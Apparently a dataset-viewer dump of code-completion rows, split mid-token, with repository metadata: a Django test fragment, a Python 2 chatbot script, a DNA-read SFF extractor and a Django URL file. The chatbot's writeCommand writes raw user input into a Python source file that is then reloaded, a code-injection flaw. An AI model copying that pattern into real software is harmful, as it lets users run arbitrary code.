def test_validation_with_empty_blank_field(self):
# Since a value f
|
or pub_date wasn't provided and the field is
# blank=True, model-validation should pass.
# Also, Article.clean() should be run, so pub_date will be fil
|
led after
# validation, so the form should save cleanly even though pub_date is
# not allowed to be null.
data = {
'title': 'The state of model validation',
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), [])
self.assertNotEqual(form.instance.pub_date, None)
article = form.save()
def test_validation_with_invalid_blank_field(self):
# Even though pub_date is set to blank=True, an invalid value was
# provided, so it should fail validation.
data = {
'title': 'The state of model validation',
'pub_date': 'never'
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), ['pub_date'])
|
indie-dev/Clarissa
|
bot.py
|
Python
|
apache-2.0
| 2,985
| 0.022446
|
import os
import sys as sys
os.system("python bot/bot.py engage")
import bot_response as bot
import bot_learn as learner
def hasUserSwore(message):
if "fuck" in message:
return True
elif "bitch" in message:
return True
elif "Fuck" in message:
return True
elif "Bitch" in message:
return True
else:
return False
#Allow the user to communicate with the bot
#Also allow the bot to learn about the person
def toBot():
if(os.path.isfile(".bot_engage")):
print "You can only run one instance of Clarissa."
else:
swearNum = 1
messageToBot = raw_input("Message: ")
if(messageToBot == "--add-command"):
writeCommand(command=raw_input("Command: "), response=raw_input("Responses: "))
reload(bot)
elif(messageToBot == "kill-bot"):
exit()
elif(messageToBot == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif(messageToBot == "learn"):
learner.learn(db_support=False)
elif(messageToBot == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
bot.getResponse(messageToBot)
toBot()
def writeCommand(command, response):
file = open("bot_response.py", "a")
file.write("\n\telif(messageToBot == \""+command+"\"):")
file.write("\n\t\tprint \"Clarissa: "+response+"\"")
file.flush()
file.close()
commandList = open("commands.list", "w")
commandList.write(command)
commandList.flush()
commandList.close()
def getIf(message, command, response):
if(message == com
|
mand):
print "Clarissa: "+response
else:
print "I do not understand "+message
def getCommands():
return open("commands.bot", "r").read()
def getResponses():
return open("respo
|
nses.bot", "r").read()
swearNum = 0
try:
if(sys.argv[1] == "--add-command"):
writeCommand(command=sys.argv[2], response=sys.argv[3])
reload(bot)
elif (sys.argv[1] == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif (sys.argv[1] == "learn"):
learner.learn(db_support=False)
elif (sys.argv[1] == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
else:
toBot()
except IndexError:
toBot()
|
cfe-lab/Umberjack
|
test/simulations/indelible/__init__.py
|
Python
|
bsd-2-clause
| 20
| 0
|
__aut
|
hor__ =
|
'thuy'
|
JoseBlanca/ngs_crumbs
|
crumbs/seq/sff_extract.py
|
Python
|
gpl-3.0
| 7,004
| 0.000571
|
# Copyright 2012 Jose Blanca, Peio Ziarsolo, COMAV-Univ. Politecnica Valencia
# This file is part of ngs_crumbs.
# ngs_crumbs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# ngs_crumbs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with ngs_crumbs. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
from array import array
from crumbs.utils.optional_modules import SffIterator
# pylint: disable=R0913
def _min_left_clipped_seqs(sff_fhand, trim, min_left_clip):
'It generates sequences (as tuples) given a path to a SFF file.'
for record in SffIterator(sff_fhand, trim=False):
annots = record.annotations
clip_qual = annots['clip_qual_left']
clip_adapt = annots['clip_adapter_left']
clip = max(min_left_clip, clip_qual, clip_adapt)
seq = record.seq
if trim:
record.annotations = {}
record = record[clip:]
else:
annots['clip_qual_left'] = clip
annots['clip_adapter_left'] = clip
seq = seq[:clip].lower() + seq[clip:].upper()
quals = record.letter_annotations['phred_quality']
record.letter_annotations = {}
record.seq = seq
dict.__setitem__(record._per_letter_annotations,
"phred_quality", quals)
yield record
class SffExtractor(object):
'This class extracts the reads from an SFF file'
def __init__(self, sff_fhands, trim=False, min_left_clip=0,
nucls_to_check=50, max_nucl_freq_threshold=0.5):
'It inits the class'
self.fhands = sff_fhands
self.trim = trim
self.min_left_clip = min_left_clip
# checking
self.nucls_to_check = nucls_to_check
self.max_nucl_freq_threshold = max_nucl_freq_threshold
self.nucl_counts = {}
@property
def seqs(self):
'It yie
|
lds all sequences'
for fhand in self.fhands:
self._prepare_nucl_counts(fhand.name)
if not self.min_left_clip:
seqs = SffIterator(fhand, trim=self.trim)
else:
seqs = _min_left_clipped_seqs(fha
|
nd, self.trim,
self.min_left_clip)
for record in seqs:
self._update_nucl_counts(str(record.seq), fhand.name)
yield record
def _prepare_nucl_counts(self, fpath):
'It prepares the structure to store the nucleotide counts'
counts = {'A': array('L', [0] * self.nucls_to_check),
'T': array('L', [0] * self.nucls_to_check),
'C': array('L', [0] * self.nucls_to_check),
'G': array('L', [0] * self.nucls_to_check)}
self.nucl_counts[fpath] = counts
def _update_nucl_counts(self, seq, fpath):
'Given a seq (as a string) it updates the nucleotide counts'
seq = seq[:self.nucls_to_check]
counts = self.nucl_counts
for index, nucl in enumerate(seq):
try:
counts[fpath][nucl][index] += 1
except KeyError:
pass # we do not count the lowercase letters
@property
def clip_advice(self):
'It checks how many positions have a high max nucl freq.'
advices = {}
for fhand in self.fhands:
fpath = fhand.name
counts = self.nucl_counts[fpath]
treshold = self.max_nucl_freq_threshold
pos_above_threshold = 0
seq_above_threshold = ''
index = 0
for index in range(self.nucls_to_check):
num_nucls = [counts['A'][index], counts['T'][index],
counts['C'][index], counts['G'][index]]
tot_nucls = sum(num_nucls)
if not tot_nucls:
continue
freq_nucls = [i / tot_nucls for i in num_nucls]
above_threshold = [i >= treshold for i in freq_nucls]
if any(above_threshold):
pos_above_threshold += 1
seq_above_threshold += _get_nucl_with_max_freq('ATCG',
freq_nucls)
else:
break
if pos_above_threshold:
if self.trim:
# number of nucleotides to remove next time, the ones
# that we have detected plus the ones already removed
advice = index + self.min_left_clip, seq_above_threshold
else:
advice = index, seq_above_threshold
else:
advice = None
advices[fpath] = advice
return advices
def _do_seq_xml(seq):
seq = seq.object
annots = seq.annotations
read_len = len(seq)
read_name = seq.id
if 'E3MFGYR02FTGED' == read_name:
print annots, read_len
qual_left = annots.get('clip_qual_left', 0)
qual_right = annots.get('clip_qual_right', 0)
vector_left = annots.get('clip_adapter_left', 0)
vector_right = annots.get('clip_adapter_right', 0)
if vector_right >= read_len:
vector_right = 0
if qual_right >= read_len:
qual_right = 0
qual_left = 0 if qual_left < 0 else qual_left
qual_right = 0 if qual_right < 0 else qual_right
vector_left = 0 if vector_left < 0 else vector_left
vector_right = 0 if vector_right < 0 else vector_right
xml = '\t<trace>\n'
xml += '\t\t<trace_name>{}</trace_name>\n'.format(read_name)
if qual_left:
xml += '\t\t<clip_quality_left>{}</clip_quality_left>\n'.format(int(qual_left) + 1)
if qual_right:
xml += '\t\t<clip_quality_rigth>{}</clip_quality_rigth>\n'.format(qual_right)
if vector_left:
xml += '\t\t<clip_vector_left>{}</clip_vector_left>\n'.format(int(vector_left) + 1)
if vector_right:
xml += '\t\t<clip_vector_rigth>{}</clip_vector_rigth>\n'.format(vector_right)
xml += '\t</trace>\n'
return xml
def write_xml_traceinfo(seqs, fhand):
fhand.write('<?xml version="1.0"?>\n<trace_volume>\n')
for seq in seqs:
fhand.write(_do_seq_xml(seq))
yield seq
fhand.write('</trace_volume>\n')
fhand.flush()
def _get_nucl_with_max_freq(nucls, freq_nucls):
'It returns the nucleotide with the maximum frequency'
max_ = None
for index, freq in enumerate(freq_nucls):
if max_ is None or max_ < freq:
max_ = freq
nucl = nucls[index]
return nucl
|
CarlGraff/fundraisermemorial
|
fundraiser_app/urls.py
|
Python
|
mit
| 663
| 0.006033
|
from django.conf.urls import url
from fundraiser_app import views
urlpatterns = [
url(r'^$', views.FMItemListView.as_view(), name='fmitem_list'),
url(r'^about/$', views.About
|
View.as_view(), name='about'),
url(r'^fmitem/(?P<pk>\d+)$', views.FMItemDetailView.as_view(), name='fmitem_detail'),
url(r'^fmitem/new$', views.FMItemCreateView.as_view(), name='fmitem_new'),
url(r'^fmitem/(?P<pk>\d+)/edit$', views.FMItemUpdateView.as_view(), name='fmitem_edit'),
url(r'^fmitem/(?P<pk>\d+)/remove$', views.FMItemDeleteV
|
iew.as_view(), name='fmitem_remove'),
url(r'^fmitem/(?P<pk>\d+)/publish/$', views.fmitem_publish, name='fmitem_publish'),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.